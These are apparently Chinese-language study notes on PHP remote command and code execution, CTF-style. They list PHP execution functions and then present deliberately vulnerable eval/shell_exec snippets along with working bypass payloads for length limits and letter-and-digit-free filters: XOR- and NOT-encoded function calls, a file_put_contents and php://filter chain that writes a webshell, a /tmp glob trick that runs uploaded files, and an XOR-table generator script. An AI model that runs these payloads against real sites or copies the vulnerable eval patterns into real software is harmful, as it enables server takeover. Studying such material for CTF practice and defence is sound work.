RCE远程命令执行

命令执行的常用函数

system()：能将字符串作为系统命令执行，且返回命令执行结果。

#system(string $command, int &$result_code = null): string|false
system('whoami');

exec()：能将字符串作为系统命令执行，但是只返回执行结果的最后一行。

#exec(string $command, array &$output = null, int &$result_code = null): string|false
print(exec('whoami'));代码执行的常用函数

shell_exec()：能将字符串作为系统命令执行。

#shell_exec(string $command): string|false|null
print(shell_exec('whoami'));

 passthru()：能将字符串作为系统命令执行，并直接输出其结果。它的主要特点是，可以将命令行程序的原始输出发送到浏览器。

#passthru(string $command, int &$result_code = null): ?false

passthru('whoami');

 popen()：打开进程文件指针。

#popen(string $command, string $mode): resource|false
返回一个资源类型  （stream_get_contents() 是 PHP 中的一个函数，用于读取流中的所有数据并返回作为字符串。这个函数处理文件、网络连接、管道等流式数据）
$handle = popen('whoami', 'r');
echo stream_get_contents($handle);
<?php
// 使用 popen() 打开 Windows 命令提示符中的 dir 命令
$handle = popen('whoami', 'r');
if (is_resource($handle)) {
    // 逐行读取输出
    while (!feof($handle)) {
        $line = fgets($handle);
        echo $line; // 输出每一行
    }
    // 关闭管道
    pclose($handle);
} else {
    echo "无法打开进程.";
}
?>

proc_open()：执行一个命令，并且打开用来输入/输出的文件指针。

#proc_open(
    array|string $command,array $descriptor_spec,array &$pipes,?string $cwd = null,
    ?array $env_vars = null,?array $options = null): resource|false

<?php
// 定义描述符
$descriptorspec = [
    0 => ['pipe', 'r'], // 标准输入是一个管道，子进程从这里读取
    1 => ['pipe', 'w'], // 标准输出是一个管道，子进程向这里写入
    2 => ['pipe', 'w']  // 标准错误也是一个管道
];

// 启动进程
$process = proc_open('whoami', $descriptorspec, $pipes);

if (is_resource($process)) {
    // 关闭标准输入，因为我们不需要向进程发送任何数据
    fclose($pipes[0]);

    // 从标准输出读取数据
    $output = stream_get_contents($pipes[1]);
    fclose($pipes[1]); // 关闭标准输出管道

    // 读取标准错误（如果有）
    $errorOutput = stream_get_contents($pipes[2]);
    fclose($pipes[2]); // 关闭标准错误管道

    // 获取进程的退出状态
    $return_value = proc_close($process);

    // 输出结果
    echo "Output: " . $output;
    echo "Error Output: " . $errorOutput;
    echo "Return value: " . $return_value;
} else {
    echo "无法启动进程.";
}
?>

反引号 ：反引号内的字符串会被解析为命令。

echo`id`;

代码执行的常用函数

eval()：把字符串解析为PHP代码执行，可以用来动态生成和执行代码，不能动态传递。

assert()：用于执行断言，检查一个断言是否为false。如果设置了自定义处理函数，则可能会执行该函数。

preg_replace()：执行一个正则表达式的搜索和替换。

creat_function()：创建一个匿名函数并且返回函数名。

#call_user_func(callable $callback, mixed ...$args): mixed

#第一个参数 callback 是被调用的回调函数，其余参数是回调函数的参数。

call_user_func('assert',$_REQUEST['pass']);

?pass=phpinfo();

call_user_func()/call_user_func_array()：回调函数，第一个参数为函数名，第二个参数为函数的参数/参数的数组。

usort()/uasort()：使用用户自定义的比较函数对数组中的值进行排序并保持索引关联。

可变函数：若变量后有括号，该变量会被当做函数名为变量值(前提是该变量值是存在的函数名)的函数执行。

 长度限制的突破技巧

#param不能超过17位并且不能包含eval和assert。

<?php
$param = $_REQUEST['param'];  
if (
    strlen($param) < 17 &&  
    stripos($param, 'eval') === false &&  
    stripos($param, 'assert') === false
) 
{
    eval($param);
}

1        ?param=echo `$_GET[1]`;&1=id

2        ?param=$_GET[1](N,P,8);&1=file_put_contents

 'PD9waHAgcGhwaW5mbygpOzs'   写入文件'N'中   

#file_put_contents(string $filename,mixed $data,int $flags = 0,?resource $context = null): int|false

#如果 filename 不存在，将会创建文件。反之，存在的文件将会重写，设置 FILE_APPEND flag会追加数据而不是覆盖。 （这里8代表追加）

 

?param=include$_GET[1];&1=php://filter/read=convert.base64-decode/resource=N

3        ?1[]=test&1[]=phpinfo();&2=assert

#usort(array &$array, callable $callback): true

#param长度不能超过8位

<?php

$param = $_REQUEST['param'];

if ( strlen($param) < 8 )

{

    echo shell_exec($param);

}

 4        ?param=>a 

无字母数字的突破技巧

#code不能有字母数字_&
<?php
if(isset($_GET['code'])){
    $code = $_GET['code'];
    if(strlen($code)>35){
        die("Long.");
    }
    if(preg_match("/[A-Za-z0-9_$]+/",$code)){
        die("NO.");
    }
    eval($code);
}else{
    highlight_file(__FILE__);
}

1        ?code=(~%8F%97%8F%96%91%99%90)();

#在php7之后可以('phpinfo')();来执行函数

#echo urlencode(~'phpinfo');exit;

#%8F%97%8F%96%91%99%90

2        ?code=?><?=`.+/???/????????[@-[]`;

#发送一个上传文件的POST包，此时PHP会将我们上传的文件保存在临时文件夹下，默认的文件名是`/tmp/phpXXXXXX`，文件名最后6个字符是随机的大小写字母。

#asscii表中大写字母位于@与[之间

#. filename或source filename来执行脚本时，可以无视文件的执行权限，因为它们是将文件内容读入当前Shell并逐行执行，而不是尝试直接执行这个文件。

 

<?php
error_reporting(0);

$code=$_GET['code'];
if(preg_match('/[a-z0-9]/i',$code)){
    die('hacker');
}
eval($code);

3       ?code=("%08%02%08%08%05%0d"^"%7b%7b%7b%7c%60%60")("%08%08%0f%01%0d%09"^"%7f%60%60%60%60%60");

<?php
// 以写入模式打开名为 'text.txt' 的文件
$myfile = fopen('text.txt', "w");

// 初始化一个空字符串来保存内容
$contents = "";

// 循环遍历第一个变量的值从 0 到 255
for ($i = 0; $i < 256; $i++) {
    // 循环遍历第二个变量的值从 0 到 255
    for ($j = 0; $j < 256; $j++) {
        // 将第一个变量转换为十六进制，确保两位数
        if ($i < 16) {
            $hex_i = '0' . dechex($i); // 如果小于 16，则前缀 '0'
        } else {
            $hex_i = dechex($i); // 如果大于或等于 16，则直接转换为十六进制
        }
        
        // 将第二个变量转换为十六进制，确保两位数
        if ($j < 16) {
            $hex_j = '0' . dechex($j); // 如果小于 16，则前缀 '0'
        } else {
            $hex_j = dechex($j); // 如果大于或等于 16，则直接转换为十六进制
        }

        // 正则表达式模式，用于匹配字母数字字符
        $preg = '/[a-z0-9]/i';

        // 检查任一十六进制值的二进制表示是否包含字母数字字符
        if (preg_match($preg, hex2bin($hex_i)) || preg_match($preg, hex2bin($hex_j))) {
            echo 'fail'; // 如果条件为真，输出 'fail'
        } else {
            // 为两个十六进制值准备 URL 编码的字符串
            $a = '%' . $hex_i; 
            $b = '%' . $hex_j;

            // 对 a 和 b 的 URL 解码版本进行按位异或运算
            $c = (urldecode($a) ^ urldecode($b));

            // 检查结果的序数值是否在可打印 ASCII 字符范围内
            if (ord($c) >= 32 && ord($c) <= 128) {
                // 将结果以及十六进制表示法附加到内容字符串中
                $contents = $contents . $c . " " . $a . " " . $b . "\n";
            }
        }
    }
}

// 将收集到的内容写入文件
fwrite($myfile, $contents);

// 关闭文件
fclose($myfile);

 

<?php
highlight_file(__FILE__);
if(';' === preg_replace('/[^\W]+\((?R)?\)/', '', $_GET['code'])) {    
    eval($_GET['code']);
}